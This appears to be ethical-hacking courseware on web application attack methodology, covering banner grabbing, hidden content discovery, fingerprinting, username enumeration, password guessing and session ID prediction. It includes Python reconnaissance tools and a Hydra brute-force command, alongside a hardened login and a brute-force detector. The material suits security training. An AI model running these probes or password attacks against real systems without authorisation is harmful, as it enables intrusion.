Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select the exploits from vulnerability databases to attack a web server and its applications.

    C:\> telnet www.juggyboy.com 80
    HEAD / HTTP/1.0

A banner can be grabbed with the help of tools such as:

- Telnet
- Netcat
- ID Serve
- Netcraft

These tools make banner grabbing and analysis an easy task.
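The following is an added example, not code from the courseware, that does in Python what the telnet session above does by hand and ties it to the service-discovery port table: it sends HEAD / HTTP/1.0 to each candidate port, wraps the TLS port, and parses the Server, X-Powered-By and Via headers out of the response. probe() needs network access; parse_banner() is exercised on a constructed response whose Server value (Microsoft-IIS/6.0) and X-Powered-By header are assumptions, since the slide only says the server was identified as Microsoft IIS.

```python
import socket
import ssl

# Ports from the service-discovery table earlier in this section.
HTTP_PORTS = {80: "World Wide Web standard port", 81: "Alternate WWW",
              443: "SSL (https)", 900: "IBM WebSphere administration client",
              2301: "Compaq Insight Manager"}
TLS_PORTS = {443}

# Constructed response, modelled on the telnet session on the slide; the
# Server and X-Powered-By values are assumed, not taken from the original.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Server: Microsoft-IIS/6.0\r\n"
                   b"X-Powered-By: ASP.NET\r\n"
                   b"Content-Type: text/html\r\n"
                   b"Content-Length: 1270\r\n"
                   b"Via: 1.1 Application and Content Networking System Software 5.1.15\r\n"
                   b"Connection: Close\r\n"
                   b"\r\n")


def build_head_request(host):
    """HEAD / HTTP/1.0 as on the slide, plus Host: so name-based virtual
    hosts answer for the right site rather than the server default."""
    return ("HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host).encode("ascii")


def parse_banner(raw):
    """Pull the status line and the headers that identify the server stack."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {
        "status": lines[0],
        "server": headers.get("server"),            # make/version of the web server
        "powered_by": headers.get("x-powered-by"),  # application framework
        "via": headers.get("via"),                  # proxy/CDN layers in the path
        "headers": headers,
    }


def _recv_headers(sock, limit=8192):
    data = b""
    while b"\r\n\r\n" not in data and len(data) < limit:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
    return data


def probe(host, ports=HTTP_PORTS, timeout=3.0):
    """Connect to each port, send HEAD and return the parsed banners.
    Needs network access; not exercised by the offline checks."""
    results = {}
    for port in sorted(ports):
        try:
            sock = socket.create_connection((host, port), timeout=timeout)
            if port in TLS_PORTS:
                ctx = ssl.create_default_context()
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE   # recon only: accept any certificate
                sock = ctx.wrap_socket(sock, server_hostname=host)
            with sock:
                sock.settimeout(timeout)
                sock.sendall(build_head_request(host))
                results[port] = parse_banner(_recv_headers(sock))
        except OSError as exc:
            results[port] = {"error": str(exc)}
    return results


if __name__ == "__main__":
    print(parse_banner(SAMPLE_RESPONSE)["server"])
```

The Via header is worth keeping alongside Server: on the slide it shows a content-networking appliance in front of the origin, so the banner you see may belong to the proxy rather than to the web server that runs the application.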


Footprint Web Infrastructure: Hidden Content Discovery

Discover the hidden content and functionality that is not reachable from the main visible content, in order to exploit user privileges within the application

It allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc.

Web Spidering: web spiders automatically discover the hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Web spidering tools: OWASP Zed Attack Proxy, Burp Spider, WebScarab

Attacker-Directed Spidering: the attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses; the intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. Tool: OWASP Zed Attack Proxy

Automated guessing: use automation tools such as Burp Suite to make huge numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality


Footprint Web Infrastructure: Hidden Content Discovery

Crucial business information such as product prices, discounts, login IDs, and passwords is kept secret and is usually not visible to outsiders; parts of it end up in files and functionality that are never linked from the visible site. Discover the hidden content and functionality that is not reachable from the main visible content in order to exploit user privileges within the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc. Such hidden content can be found with the help of three techniques:

Web Spidering

Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses.

Tools that can be used to discover hidden content by means of web spidering include:

- OWASP Zed Attack Proxy
- Burp Spider
- WebScarab
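The following is an added example, not code from the courseware or from any of the tools named above, showing the three discovery techniques of this slide on one constructed page: spidering every reference the HTML exposes (including a path leaked in an HTML comment, which link-only spiders miss), generating backup-file guesses next to each spidered script, and blind guesses from a small wordlist. The host www.example.test and the COMMON_PATHS wordlist are assumptions of this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BASE = "http://www.example.test/"   # hypothetical target

# Constructed page: a linked page, a form, a script, and a path leaked in a comment.
SAMPLE_HTML = """<html><body>
<a href="/products.php?id=1">Products</a>
<form action="/login.php" method="post"><input name="user"></form>
<script src="/js/app.js"></script>
<!-- TODO remove before go-live: /admin/old_backup.zip -->
</body></html>"""


class LinkCollector(HTMLParser):
    """Web spidering: harvest every reference the HTML exposes, not only <a href>."""
    LINK_ATTRS = {("a", "href"), ("form", "action"), ("script", "src"),
                  ("iframe", "src"), ("link", "href"), ("img", "src")}

    def __init__(self, base):
        super().__init__()
        self.base = base
        self.urls = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) in self.LINK_ATTRS and value:
                self.urls.add(urljoin(self.base, value))

    def handle_comment(self, data):
        # Paths in HTML comments are a classic leak that link-only spiders miss.
        for path in re.findall(r"/[\w./-]+", data):
            self.urls.add(urljoin(self.base, path))


def spider(html, base):
    """Return the in-scope URLs discoverable from one page."""
    collector = LinkCollector(base)
    collector.feed(html)
    host = urlsplit(base).netloc
    return {u for u in collector.urls if urlsplit(u).netloc == host}


def backup_candidates(url):
    """Automated guessing: names editors, admins and deploy scripts leave
    next to a known file (login.php -> login.php.bak, login.bak, .login.php.swp ...)."""
    name = urlsplit(url).path.rsplit("/", 1)[-1]
    guesses = [name + s for s in (".bak", ".old", ".orig", ".txt", "~")]
    guesses.append("." + name + ".swp")
    if "." in name:
        guesses.append(name.rsplit(".", 1)[0] + ".bak")
    return [urljoin(url, g) for g in guesses]


# Names worth requesting blindly on any host (assumed wordlist for this example).
COMMON_PATHS = ["admin/", "backup/", "old/", "test/", "config.php",
                "web.config", "robots.txt", ".git/HEAD", "phpinfo.php"]


def guess_paths(base, wordlist=COMMON_PATHS):
    return [urljoin(base, w) for w in wordlist]


def discover(html, base):
    """All three techniques together: spidered links, backup guesses for each
    spidered script, and blind guesses. Live use would then request each URL
    and keep the ones that do not answer 404."""
    found = spider(html, base)
    guesses = set(guess_paths(base))
    for u in found:
        if urlsplit(u).path.endswith((".php", ".asp", ".aspx", ".jsp")):
            guesses.update(backup_candidates(u))
    return found, guesses - found


if __name__ == "__main__":
    found, guesses = discover(SAMPLE_HTML, BASE)
    print("spidered:", sorted(found))
    print("to guess:", sorted(guesses))
```

Keeping the spidered set and the guessed set apart matters in practice: spidered URLs are known to exist, while guessed ones produce a large volume of requests and need a 404-versus-200 (or content-length) check before they mean anything.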


Web Spidering Using Burp Suite

1. Configure your web browser to use Burp as a local proxy
2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
5. Continue these steps recursively until no further content or functionality is identified

[Screenshot: Burp Suite Free Edition v1.4.01, Intruder attack window showing a captured request and its response]

http://www.portswigger.net

Web Spidering Using Burp Suite

Source: http://www.portswigger.net

Burp Suite is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Web spidering using Burp Suite is done in the following manner:

1. Configure your web browser to use Burp as a local proxy

2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available

3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled

4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions


Web Spidering Using Mozenda Web Agent Builder

Mozenda Web Agent Builder crawls through a website and harvests pages of information

Web Spidering Using Mozenda Web Agent Builder

Source: http://www.mozenda.com

Mozenda Web Agent Builder is a Windows application used to build your data extraction project. It crawls through a website and harvests pages of information. Web Agent Builder is a tool suite that includes an intuitive UI and a browser-based instruction set. Setting up your crawler is as simple as pointing and clicking to navigate pages and capture the information you want.


Methodology stages: Attack Web Servers; Attack Authentication Mechanism; Attack Session Management Mechanism; Attack Data Connectivity; Attack Web Services

Web App Hacking Methodology

Attack Web Servers

Once you have conducted full-scope footprinting of the web infrastructure, analyze the gathered information to find the vulnerabilities that can be exploited to launch attacks on the web servers. Then attempt to attack the web servers using the various techniques available. Every website or web application is served by a web server whose code delivers that site or application; the attacker exploits the vulnerabilities in that code and launches attacks on the web server. Detailed information about hacking web servers is given on the following slides.


Hacking Web Servers

Once the attacker identifies the web server environment, he or she scans for known vulnerabilities using a web server vulnerability scanner. Vulnerability scanning helps the attacker launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker has gathered all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. To stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against it. Attacks on a vulnerable web server can be launched with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.


Web Server Hacking Tool: WebInspect

Source: https://download.hpsmartupdate.com

WebInspect identifies security vulnerabilities in web applications. It runs interactive scans using a sophisticated user interface, and an attacker can exploit the identified vulnerabilities to carry out web services attacks.

WebInspect software is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities for launching web services attacks.


Web App Hacking Methodology

Analyze Web Applications

Analyzing the web application helps you identify the different vulnerable points that an attacker can exploit to compromise the web application. Detailed information about analyzing a web application and identifying the entry points for breaking into it is discussed on the following slides.


Analyze Web Applications

Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes

Identify Entry Points for User Input: review the generated HTTP requests to identify the input entry points
Identify Server-Side Functionality: observe the application's behavior revealed to the client to identify the server-side structure and functionality
Identify Server-Side Technologies: fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting
Map the Attack Surface: identify the various attack surfaces uncovered by the application and the vulnerabilities that are associated with each one


Analyze Web Applications

Web applications have various vulnerabilities. First, the attacker has to acquire basic knowledge of the web application and then analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Identify Entry Points for User Input

The entry points of an application are also the entry points for attacks; they include every place where the front-end web application accepts data from HTTP requests. Review the generated HTTP requests to identify the user input entry points.

Identify Server-Side Functionality

Server-side functionality refers to the programs a server executes to produce the pages it serves: scripts that reside on particular web servers and make interactive web pages or websites possible. Observe the behavior the application reveals to the client to infer the server-side structure and functionality.

Identify Server-Side Technologies

Server-side technologies, or server-side scripting, refer to the dynamic generation of web pages served by the web servers, as opposed to static web pages that are held in the server's storage and served to web browsers unchanged. Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.


Analyze Web Applications: Identify Entry Points for User Input

Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields

Identify HTTP header parameters that can be processed by the application as user inputs, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers

Determine the URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL

Tools used: Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy


Analyze Web Applications: Identify Entry Points for User Input

During web application analysis, attackers identify the entry points for user input so that they can understand the way the web application accepts or handles user input. Then the attacker tries to find the vulnerabilities present in the input-handling mechanism and tries to exploit them to gain access to the web application. Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields.

Identify HTTP header parameters that can be processed by the application as user inputs, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers.

Determine the URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.

The tools used to analyze web applications to identify entry points for user input include Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy, etc.


Analyze Web Applications: Identify Server-Side Technologies

- Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server-side technologies
- Examine URLs for file extensions, directories, and other identification information
- Examine the error page messages
- Examine session tokens:
  - JSESSIONID - Java
  - ASPSESSIONID - IIS server
  - ASP.NET_SessionId - ASP.NET
  - PHPSESSID - PHP

[Figure: server banners such as Microsoft-IIS/6.0, Apache/2.0.32 (Fedora), and SunONE WebServer / Netscape-Enterprise/4.1, and an error page at http://juggyboy.com/error.aspx reading "Server Error in '/ReportServer' Application. Could not find the permission set named 'ASP.Net'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Version Information: Microsoft .Net Framework Version 4.0.30319; ASP.Net Version 4.0.30319.1"]

Analyze Web Applications: Identify Server-Side Technologies

Source: http://net-square.com

After identifying the entry points through user inputs, attackers try to identify server-side technologies.

The server-side technologies can be identified as follows:

1. Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server-side technologies
2. Examine URLs for file extensions, directories, and other identification information
3. Examine the error page messages
4. Examine session tokens:
   - JSESSIONID - Java
   - ASPSESSIONID - IIS server
   - ASP.NET_SessionId - ASP.NET
   - PHPSESSID - PHP
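The two checks described on the last two slides, listing the entry points for user input and fingerprinting the server-side technology, carried out on a captured HTTP exchange. This is an added example and not code from the courseware or from the tools it names; the request and response are constructed samples built around the slide's juggyboy.com URL, and the header names, file extensions and session cookie names it matches against are the ones listed on the slides.

```python
"""Enumerate user-input entry points from a captured HTTP request and collect
server-side technology indicators from the matching response.
Added example, not code from the CEH courseware; the request and response
below are constructed samples modelled on the slide's juggyboy.com URL."""
import os
from urllib.parse import urlsplit, parse_qsl

# Constructed request: the slide's example URL plus typical browser headers.
SAMPLE_REQUEST = (
    "GET /customers.aspx?name=existing%20clients&isActive=0"
    "&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name HTTP/1.1\r\n"
    "Host: www.juggyboy.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: https://www.juggyboy.com/index.aspx\r\n"
    "Accept-Language: en-US\r\n"
    "Cookie: ASP.NET_SessionId=abc123; theme=dark\r\n"
    "\r\n"
)
# Constructed POST request with a form body.
SAMPLE_POST = (
    "POST /login.aspx HTTP/1.1\r\n"
    "Host: www.juggyboy.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=jason&pass=secret&remember=1"
)
# Constructed response carrying the kind of banners the slide shows.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Set-Cookie: ASP.NET_SessionId=abc123; path=/; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Request headers the application may treat as user input (the slide's list).
INPUT_HEADERS = {"user-agent", "referer", "accept", "accept-language", "host"}
# Session cookie names and the platform each indicates (the slide's list).
SESSION_COOKIES = {"jsessionid": "Java", "aspsessionid": "IIS server",
                   "asp.net_sessionid": "ASP.NET", "phpsessid": "PHP"}
# URL file extensions and the platform each usually indicates.
EXTENSIONS = {".aspx": "ASP.NET", ".asp": "Classic ASP", ".jsp": "Java", ".php": "PHP"}


def parse_message(raw):
    """Split a raw HTTP message into (start line, {header: value}, body).
    Repeated headers (e.g. several Set-Cookie lines) collapse to the last one."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def entry_points(raw_request):
    """Every field the server may process as user input, grouped by source."""
    start, headers, body = parse_message(raw_request)
    method, target, _ = start.split(" ", 2)
    url = urlsplit(target)
    cookie_names = [c.split("=", 1)[0].strip()
                    for c in headers.get("cookie", "").split(";") if c.strip()]
    return {
        "path": url.path,
        "query": [k for k, _ in parse_qsl(url.query, keep_blank_values=True)],
        "headers": sorted(h for h in headers if h in INPUT_HEADERS),
        "cookies": sorted(cookie_names),
        "body": [k for k, _ in parse_qsl(body, keep_blank_values=True)]
                if method == "POST" else [],
    }


def fingerprint(raw_request, raw_response):
    """Technology indicators from the URL extension, response headers and cookie."""
    start, _, _ = parse_message(raw_request)
    path = urlsplit(start.split(" ", 2)[1]).path
    _, headers, _ = parse_message(raw_response)
    evidence = {}
    ext = os.path.splitext(path)[1].lower()
    if ext in EXTENSIONS:
        evidence["extension " + ext] = EXTENSIONS[ext]
    for h in ("server", "x-powered-by", "x-aspnet-version"):
        if h in headers:
            evidence[h] = headers[h]
    cookie = headers.get("set-cookie", "").split("=", 1)[0].strip().lower()
    if cookie in SESSION_COOKIES:
        evidence["cookie " + cookie] = SESSION_COOKIES[cookie]
    return evidence


if __name__ == "__main__":
    print(entry_points(SAMPLE_REQUEST))
    print(entry_points(SAMPLE_POST))
    print(fingerprint(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

Run stand-alone it prints the entry points of both requests and the evidence dictionary. Applied to a proxy history (for instance a Burp Suite or OWASP ZAP export) the same logic gives the tester the input surface to exercise and gives the defender the list of banners and cookie names the application leaks, which is the list to review against the server's header configuration.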


Analyze Web Applications: Identify Server-Side Functionality

Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications

Tools used:
- GNU Wget - http://www.gnu.org
- Teleport Pro - http://www.tenmax.com
- BlackWidow - http://softbytelabs.com

Examine URL (the https scheme shows SSL in use; the .aspx extension shows the ASP.NET platform):

https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name

Analyze Web Applications: Identify Server-side Functionality

Once the server-side technologies are determined, identify the server-side functionality. This helps you to find the potential vulnerabilities in server-side functionalities. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.

Tools Used:

Wget

Source: http://www.gnu.org

GNU Wget is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support, etc.

Teleport Pro

Source: http://www.tenmax.com

Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and


Analyze Web Applications: Map the Attack Surface

Information                    Attack
Client-Side Validation         Injection Attack, Authentication Attack
Database Interaction           SQL Injection, Data Leakage
File Upload and Download       Directory Traversal
Display of User-Supplied Data  Cross-Site Scripting
Dynamic Redirects              Redirection, Header Injection
Login                          Username Enumeration, Password Brute-Force
Session State                  Session Hijacking, Session Fixation
Access Controls                Privilege Escalation, Injection Attack
Cleartext Communication        Data Theft, Session Hijacking
Error Message                  Information Leakage
Email Interaction              Email Injection
Application Codes              Buffer Overflows
Third-Party Application        Known Vulnerabilities Exploitation
Web Server Software            Known Vulnerabilities Exploitation

Analyze Web Applications: Map the Attack Surface

There are various entry points for attackers to compromise the network, so proper analysis of the attack surface must be done. The mapping of the attack surface includes thorough checking of possible vulnerabilities to launch the attack. The following are the various factors through which an attacker collects the information and plans the kind of attack to be launched.


[Methodology steps: Attack Web Servers | Attack Authentication Mechanism | Attack Session Management Mechanism | Attack Data Connectivity | Attack Web Services]

Web App Hacking Methodology

In web applications, the authentication functionality has many design loopholes, such as bad passwords, i.e., short or blank, common dictionary words or names, passwords set the same as the username, and those still set to default values. The attacker can exploit the vulnerabilities in the authentication mechanism for gaining access to the web application or network. The various threats that exploit the weaknesses in the authentication mechanism include network eavesdropping, brute force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.


Attack Authentication Mechanism

Most of the authentication mechanisms used by web applications have design flaws. If an attacker can identify those design flaws, he or she can easily exploit the flaws and gain unauthorized access. The design flaws include failing to check password strength, insecure transportation of credentials over the Internet, etc. Web applications usually authenticate their clients or users based on a combination of username and password. Hence, the authentication mechanism attack involves identifying and exploiting the usernames and passwords.

User Name Enumeration

User names can be enumerated in two ways; one is verbose failure messages and the other is predictable user names.

Verbose Failure Message

In a typical login system, the user is required to enter two pieces of information, that is, username and password. In some cases, an application will ask for some more information. If the user is trying to log in and fails, then it can be inferred that at least one of the pieces of information that is provided by the user is incorrect or inconsistent with the other information provided by the user. If the application discloses which particular piece of information provided by the user was incorrect or inconsistent, it provides ground for an attacker to exploit the application.


User Name Enumeration

If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method

Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts

User Name Enumeration

Source: https://wordpress.com

User name enumeration helps in guessing login IDs and passwords of users. If the login error states which part of the user name and password are not correct, guess the users of the application using the trial-and-error method.

Look at the following picture that shows enumerating user names from verbose failure messages:
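A login handler that leaks which credential was wrong, beside the uniform-message version that the slide's lockout note implies. This is an added example, not code from the courseware; the user store (a single account, jason), the PBKDF2 cost, the five-failure lockout threshold and the function names are constructed for illustration.

```python
"""Login responses that leak which credential was wrong versus a uniform
failure. Added example (not the courseware's code); the user store, the
lockout threshold and the function names are constructed for illustration."""
import hashlib
import hmac
import os
import secrets

ITERATIONS = 50_000


def _hash(password, salt):
    """PBKDF2-HMAC-SHA256; the same cost for every attempt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: username -> (salt, password hash). Only jason exists.
_SALT = os.urandom(16)
USERS = {"jason": (_SALT, _hash("correct horse", _SALT))}


def login_verbose(username, password):
    """Vulnerable: the message tells the caller whether the user name exists,
    which is exactly what the slide's trial-and-error enumeration relies on."""
    if username not in USERS:
        return "Unknown user"
    salt, digest = USERS[username]
    if _hash(password, salt) != digest:
        return "Incorrect password"
    return "OK"


# A dummy credential so that unknown users cost one PBKDF2 run as well; without
# it the response time would reveal the same thing the message used to.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash(secrets.token_hex(16), _DUMMY_SALT)

FAILED_ATTEMPTS = {}      # username -> consecutive failures
LOCKOUT_THRESHOLD = 5     # the account lockout policy the slide's note refers to
GENERIC_FAILURE = "Invalid username or password"


def login_uniform(username, password):
    """Hardened: identical message and work for unknown users, wrong passwords
    and locked accounts; constant-time comparison; lockout after N failures."""
    salt, digest = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    ok = hmac.compare_digest(_hash(password, salt), digest)
    if FAILED_ATTEMPTS.get(username, 0) >= LOCKOUT_THRESHOLD:
        ok = False        # locked: same answer as a wrong password
    if not ok:
        FAILED_ATTEMPTS[username] = FAILED_ATTEMPTS.get(username, 0) + 1
        return GENERIC_FAILURE
    FAILED_ATTEMPTS.pop(username, None)
    return "OK"


if __name__ == "__main__":
    for name in ("nobody", "jason"):
        print(name, "verbose:", login_verbose(name, "x"), "| uniform:", login_uniform(name, "x"))
```

Three things close the channel together: one failure message for every cause, the same hashing work for unknown and known user names so that response time does not replace the message, and a lockout that answers with the same message as a wrong password rather than announcing that the account exists and is locked.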


Password Attacks: Password Functionality Exploits

- Determine password change functionality within the application by spidering the application or creating a login account
- Try random strings for 'Old Password', 'New Password', and 'Confirm the New Password' fields and analyze errors to identify vulnerabilities in password change functionality
- 'Forgot Password' features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the challenge answer successfully with the help of social engineering
- Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved
- "Remember Me" functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010
- Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms

Password Attacks: Password Functionality Exploits

Password attacks are the techniques used by the attacker for discovering passwords. Attackers exploit the password functionality so that they can bypass the authentication mechanism.

Password Changing

Determine password change functionality within the application by spidering the application or creating a login account. Try random strings for Old Password, New Password, and Confirm the New Password fields and analyze errors to identify vulnerabilities in password change functionality.

Password Recovery

Forgot Password features generally present a challenge to the user; if the number of attempts is not limited, attackers can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.

Remember Me Exploit

Remember Me functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010.


Password Attacks: Password Guessing

Password List: Attackers create a list of possible passwords using most commonly used passwords, footprinting target and social engineering techniques, and try each password until the correct password is discovered

Password Dictionary: Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks

Tools: Password guessing can be performed manually or using automated tools such as Brutus, THC-Hydra, etc.

[Figure: xHydra (THC-Hydra GUI) with Target, Passwords, Tuning, Specific, and Start tabs; the output pane shows "Hydra v4.x (c) 2004 by van Hauser/THC - use allowed only for legal purposes", "[DATA] 32 tasks, 1 servers, 45380 login tries (l:1/p:45380), ~1418 tries per task", "[DATA] attacking service ftp on port 21", "[21][ftp] host: 127.0.0.1 login: marc password: success", "finished"; the generated command line is hydra 127.0.0.1 ftp -l testuser -P /tmp/passlist.txt -e ns]

Password Attacks: Password Guessing

Password guessing is a method where an attacker guesses various passwords until he or she gets the correct passwords by using the following methods: password list, password dictionary, and various tools.

Password List

Attackers create a list of possible passwords using most commonly used passwords, footprinting target and social engineering techniques, and trying each password until the correct password is discovered.

Password Dictionary

Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Tools Used for Password Guessing

Password guessing can be performed manually or using automated tools such as WebCracker, Brutus, Burp Insider, THC-Hydra, etc.

THC-Hydra

Source: http://www.thc.org


Password Attacks: Brute-forcing

Password Attacks: Brute Forcing

Brute force is one of the methods used for cracking passwords. In a brute forcing attack, attackers crack the login passwords by trying all possible values from a set of alphabetic, numeric, and special characters. The main limitation of the brute force attack is that it is only practical for identifying small passwords, such as those of two characters. Guessing becomes much harder when the password length is longer and also if it contains letters with both upper and lower case. If numbers and symbols are used, then it might even take more than a few years to guess the password, which is almost practically impossible. Commonly used password cracking tools by attackers include Burp Suite's Intruder, Brutus, SensePost's Crowbar, etc.

Burp Suite's Intruder

Source: http://portswigger.net

Burp Intruder is a module of Burp Suite. It enables the user to automate pen testing on web applications.
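Detection logic for the password guessing and brute forcing described on the last three slides, run over authentication log lines. This is an added example, not from the courseware; the log format, the addresses, the user names and the thresholds are constructed for illustration.

```python
"""Brute-force / password-guessing detection over authentication log lines.
Added example, not from the courseware: the log format, the lines and the
thresholds are constructed for illustration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log: six failures against jason from one address within a
# minute, two scattered failures and one success from another address, and
# one junk line that the parser must skip.
LOG_LINES = """\
2012-09-01T10:00:01 203.0.113.7 login user=jason result=fail
2012-09-01T10:00:03 203.0.113.7 login user=jason result=fail
2012-09-01T10:00:05 203.0.113.7 login user=jason result=fail
2012-09-01T10:00:07 203.0.113.7 login user=jason result=fail
2012-09-01T10:00:09 203.0.113.7 login user=jason result=fail
2012-09-01T10:00:11 203.0.113.7 login user=jason result=fail
2012-09-01T10:01:00 198.51.100.9 login user=bob result=fail
2012-09-01T10:02:00 198.51.100.9 login user=alice result=success
2012-09-01T10:20:00 198.51.100.9 login user=bob result=fail
this line is not an auth event
"""

LINE_RE = re.compile(r"^(\S+) (\S+) login user=(\S+) result=(success|fail)$")


def parse_log(text):
    """(timestamp, source ip, username, result) for each well-formed line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, ip, user, result = m.groups()
            events.append((datetime.fromisoformat(ts), ip, user, result))
    return events


def detect(events, window=timedelta(minutes=5), ip_threshold=5, user_threshold=5):
    """Sliding-window counts of failures per source address and per target
    account. Returns a set of (alert type, subject) tuples."""
    alerts = set()
    by_ip = defaultdict(list)      # ip -> failure timestamps inside the window
    by_user = defaultdict(list)    # user -> failure timestamps inside the window
    for ts, ip, user, result in sorted(events):
        if result != "fail":
            continue
        for key, bucket, threshold, label in (
            (ip, by_ip, ip_threshold, "brute_force_source"),
            (user, by_user, user_threshold, "targeted_account"),
        ):
            recent = bucket[key]
            recent.append(ts)
            while ts - recent[0] > window:     # drop failures outside the window
                recent.pop(0)
            if len(recent) >= threshold:
                alerts.add((label, key))
    return alerts


if __name__ == "__main__":
    for alert in sorted(detect(parse_log(LOG_LINES))):
        print(alert)
```

The two counters catch the two shapes the slides describe: many failures from one source (a list or dictionary run against one or many accounts) and many failures against one account from any source. Tune the window and thresholds to the application's normal failure rate, and alert on both before a lockout policy, which an attacker can itself turn into a denial of service, has to act.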


Session Attacks: Session ID Prediction/Brute Forcing

Every time a user logs in to a particular website, a session ID is given to the user. This session ID is valid until the session is terminated, and a new session ID is provided when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid session IDs.

- In the first step, the attacker collects some valid session ID values by sniffing traffic from authenticated users.
- Attackers then analyze captured session IDs to determine the session ID generation process, such as the structure of the session ID, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it.
- In addition, the attacker can implement a brute force technique to generate and test different values of the session ID until he or she successfully gets access to the application.
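The predictable identifier the Remember Me slide describes (RememberUser=ABY112010, initials plus a counter) beside a CSPRNG-based one, with the two checks on a sample of issued IDs that tell them apart; this serves both the Remember Me passage and the session ID analysis steps above. It is an added example, not courseware code; the generators, the cookie attribute string and the function names are hypothetical.

```python
"""Session identifier quality: the predictable scheme the slides describe
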